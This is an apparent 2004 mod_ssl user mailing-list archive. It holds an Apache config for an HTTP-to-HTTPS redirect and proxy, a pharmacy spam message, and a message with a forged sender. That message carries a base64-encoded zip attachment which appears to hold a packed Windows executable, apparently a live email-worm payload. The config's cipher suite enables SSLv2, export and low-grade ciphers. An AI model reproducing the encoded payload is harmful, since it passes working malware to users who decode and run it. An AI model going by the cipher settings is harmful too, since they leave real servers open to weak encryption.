Hi Mike,

I use the setup you want quite a lot (All cmds left in
but some altered)...

Listen XXXXXX:80

 DocumentRoot "/usr/docs"
 ServerName webserver.net
 ServerAdmin websupport@????
 
 CustomLog ......

 RewriteEngine On
 RewriteLog logs/rewrite.log
 RewriteLogLevel 0
 RewriteRule /(.*) https://webserver.net/$1 [R=301]


Listen XXXXXX:443

 DocumentRoot "/usr/docs"
 ServerName webserver.net
 ServerAdmin websupport@webserver.net

 CustomLog ......

 SSLEngine on
 SSLCipherSuite
ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP
 SSLCertificateFile /apache/somthing.crt
 SSLCertificateKeyFile /apache/something.key
 SSLCACertificateFile /apache/CA.crt

 SetEnvIf User-Agent ".*MSIE.*" ssl-unclean-shutdown

 RewriteEngine On
 RewriteLog logs/rewrite.log
 RewriteLogLevel 0
 RewriteRule /(.*) http://webserver.net:7900/$1 [P]
 ProxyPassReverse / http://webserver.net:7900/



This definately works as have about 50 servers doing
this (may need to check the ProxyPassReverse line).

Regards
Matt

--- Mike Alberghini  wrote:
> I'm in charge of a box here that's running multiple
> apache servers.
> I run the front end servers which handle the front
> end and proxying.
> The third apache server is run by another group and
> interfaces with
> backend databases and other apps.  
> 
> Here's what everying does:
> 
> 1.  Server1 runs on port 80 and redirects all
> traffic to port 443 as https
> 2.  Server2 runs on port 443 does nothing but proxy
> to the third server
>     running on port 7900
> 3.  Server3 interfaces with a bunch of apps.  I
> can't touch it.
> 
> I want to combine the first two servers.  I want one
> apache server that
> redirects all port 80 http traffic to port 443 https
> traffic and then
> proxies everything through SSL to the server on port
> 7900.
> 
> Is this possible?  Right now when I try to combine a
> Rewrite for port 80 with
> a proxy on 443 the proxy takes over all traffic
> before the rewrite can trigger.
> 
> I've tried putting the rewrite and the proxy in
> seperate virtual hosts with 
> no luck either.
> 
> -- 
> Michael Alberghini
> Software Systems Engineer
> Georgia State University
> mike@gsu.edu
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
majordomo@modssl.org


__________________________________
Do you Yahoo!?
Get better spam protection with Yahoo! Mail.
http://antispam.yahoo.com/tools
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From wzpbclxuhamf@yahoo.com  Fri Feb 27 23:44:31 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from adsl-68-248-195-9.dsl.klmzmi.ameritech.net (adsl-68-248-195-9.dsl.klmzmi.ameritech.net [68.248.195.9])
	by master.modssl.org (Postfix) with SMTP
	id 87F07A8941; Fri, 27 Feb 2004 23:44:17 +0100 (CET)
Received: from 0.35.154.0 by 68.248.195.9; Sat, 28 Feb 2004 04:37:17 +0600
Message-ID: 
From: "norrie pantilla" 
Reply-To: "norrie pantilla" 
To: modssl-announce-l@master.modssl.org,
	modssl-users-l@master.modssl.org
Subject: LingerLongLingerHardchivetero
Date: Sat, 28 Feb 2004 01:38:17 +0300
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--64820132806802652948"
X-Priority: 3
X-MSMail-Priority: Normal

----64820132806802652948
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable


three


bills


a


PILz un sale tuday oonly. reg. 20 bukz a do|se


souper xvighagrax


go|two|days|nonstop|LAD|IES|LO|VE|IT


vizit h=
ere



----64820132806802652948--


From owner-modssl-users@modssl.org  Fri Feb 27 23:49:04 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D81C9A8976; Fri, 27 Feb 2004 23:49:03 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ajanotti (ajanotti.nrel.gov [192.174.59.87])
	by master.modssl.org (Postfix) with SMTP id E3984A8934
	for ; Fri, 27 Feb 2004 23:48:50 +0100 (CET)
Date: Fri, 27 Feb 2004 15:48:44 -0700
To: modssl-users@modssl.org
Subject: Accounts department
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------whhsukeyalqicpfkemgr"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------whhsukeyalqicpfkemgr
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit



----------whhsukeyalqicpfkemgr
Content-Type: application/octet-stream; name="cabbbcbcbd.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bbabdcaba.zip"

UEsDBAoAAAAAAAB9WzBKH8ydAD4AAAA+AAAMAAAAeGhsaGt1a2UuZXhlTVqQAAMAAAAEAAAA
//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4f
ug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0K
JAAAAAAAAADEoj5LgMNQGIDDUBiAw1AYgMNQGIPDUBgO3EMYr8NQGGjcVRiBw1AYfONCGIHD
UBhHxVYYgcNQGFJpY2iAw1AYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBAwBCRUBA
AAAAAAAAAADgAA8BCwEFDABAAAAAEAAAAHAAALCwAAAAgAAAAMAAAAAAQAAAEAAAAAIAAAQA
AAAAAAAABAAAAAAAAAAA0AAAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAA
AAAAAAAAAACkwwAAFAEAAADAAACkAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAABVUFgwAAAAAABwAAAAEAAAAAAAAAAEAAAAAAAAAAAAAAAA
AACAAADgVVBYMQAAAAAAQAAAAIAAAAA0AAAABAAAAAAAAAAAAAAAAAAAQAAA4C5yc3JjAAAA
ABAAAADAAAAABgAAADgAAAAAAAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
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
